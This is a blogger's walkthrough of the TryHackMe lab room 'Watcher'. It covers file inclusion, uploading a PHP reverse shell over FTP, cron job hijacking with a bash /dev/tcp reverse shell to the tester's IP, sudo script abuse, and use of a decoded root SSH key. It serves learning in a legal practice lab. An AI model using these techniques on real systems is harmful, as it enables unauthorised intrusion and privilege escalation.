By Shamsher khan This is a Writeup of Tryhackme room “Watcher”
Room link: https://tryhackme.com/room/watcher
Note: This room is free
Watcher was an eloquently constructed beginner level box designed to help introduce some key concepts and methods that are often seen across various penetration testing platforms. Despite not having any particularly difficult parts, it required some out of the box thinking as well as the ability to effectively analyse and chain together exploitation techniques. It’s a relatively long box, but provides a thoroughly enjoyable learning experience.
Initial nmap scan shows the following ports:
21 vsftpd (up to date)
22 SSH 7.6p1 (up to date)
80 HTTP with Jekyll 4.1.1
Running a gobuster on the web server:
gobuster dir -u 10.10.211.47 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.txt
Traversing to the website and checking the
/robots.txt page shows some interesting pages.
/flag_1.txt contains the first flag. The second directory at /secret_file_do_not_read.txt can’t be accessed. Something to remember for later perhaps.
Going back to the initial webpage, there is little functionality aside from links from clicking the photo of each placemat.
The description page for each placemat has a GET parameter in the URL which displays the post that you’re looking at:
Now we have a way to read files from the server. Thinking back to our initial exploration of the robots.txt file, there was a file we didn’t have access to, maybe we can get to it via the file inclusion vulnerability? We can assume the web “root” is /var/www/html as that’s the default location.
We get credentials.
Now we have credentials, it is time to explore FTP! Connect and authenticate by using ftp 10.10.211.47. When logged in, running a dir command to list the contents of the directory shows the second flag is there, and a folder called files
files directory is empty, but we can see from the permissions that it is writeable. In the original message that we got the credentials from, it says I’ve set the files to be saved to /home/ftpuser/ftp/files . Since we can write to this directory, we can upload things to the server.
Grab a php shell from pentest monkey’s github and edit it to contain your IP and the port you plan to host a netcat listener on.
Then go back into the ftp server and into the
files folder and use the
put command to upload the shell.
Since we know the path of the uploads, it is now possible to traverse to the php file and it will execute the code inside. However, we need a netcat listener sat waiting to catch the connection.
Then traverse to 10.10.211.47/post.php?post=../../../home/ftpuser/ftp/files/shell.php (Changing the name of the file to whatever you uploaded it as) and the listener should catch a reverse shell.
Here we got reverse shell
Get TTy shell
script -qc /bin/bash /dev/null
Personally, I always like to check out the web folder when I get into a box to see if there was any files or database credentials lying about. Going to /var/www/html and typing ls shows the contents of the directory. All files and directories there are the ones we saw before, aside from more_secrets_a9f10a
In here there is the third flag!
The next thing I do is check the less-used directories, such as /opt and /media, incase there’s anything lying about. In /opt/ there is a backups directory that is owned by root and accessible by the adm group, so there is a potential avenue if we get a user that is part of that group.
Going to the /home/ directories next, both toby and mat have note.txt that are readable
toby has flag 4, I'll assume that's the first user to get. The note talks about
mat setting up cron jobs.
If we run sudo -l to check our sudo permissions, we can see that we can run ALL commands without a password as the user toby.
Going back to the information we found earlier about the cron jobs, I’m thinking we need to edit a running cronjob that executes as
mat to get user as him instead. Checking the
jobs folder, there is a
cow.sh file that we own that constantly copies BEEFY pictures to the
/tmp directory. It is owned by our current user, and so we can edit it. Examining the
/etc/crontab shows that the script runs every minute as the user
mat, so even though
toby owns it, it executes in the context of the user running the cron.
Add a reverse shell into the file the cronjob executes, obviously changing the IP and port
But before start netcat reverse shell
nc -lvp 4444
echo 'bash -c "bash -i >& /dev/tcp/10.2.12.26/4444 0>&1"' >> cow.sh
Then after a minute or so,
mat will execute the now malicious bash script and send us a reverse shell as his user.
We can now get flag 5.
In the note on mats home directory, we can see that will is explaining how he can run python3 scripts as his user using sudo. Running
sudo -l confirms this
In the scripts directory, there is two files. cmd.py and will_script.py
At the end of
will_script we can see it runs a system command that takes the parameter of
cmd, which is set to whatever is the first argument after we run the script. The cmd script is owned by mat, and shows that if we put in a
1, it will perform
ls -lah. If we put in a
2 it will perform
id and a
3 it will
will_script only allows those three commands it seems.
Since it’s hard to use text editors in a netcat shell due to env variables being off (I believe),
Since the files are in mats home directory, we add our revershell in cmd.py because can’t edit will_script.py but we can edit cmd.py
now start netcat listener
nc -lvp 3333
we can run will_script.py with the privileged of will user. but we can’t edit will_script.py so that’s why i can edit cmd.py and use AND operator to excute cmd.py with privileged of will user
and here we got shell
We got flag 6
id we can see that we are part of the
adm group.. Remember that backups folder we found earlier that was owned by the
adm group? Let's go check it out.
Echoing the key and piping to a
base64 -d reveals a private key.
Save this to a file and remember to
chmod 600 it.
Could it be that this is the root SSH key?!
And finally we got root flag
You can find me on:
For more walkthroughs stay tuned…
Before you go…
Visit my other walkthrough’s:-
and thank you for taking the time to read my walkthrough.
If you found it helpful, please hit the 👏 button 👏 (up to 40x) and share
it to help others with similar interests! + Feedback is always welcome!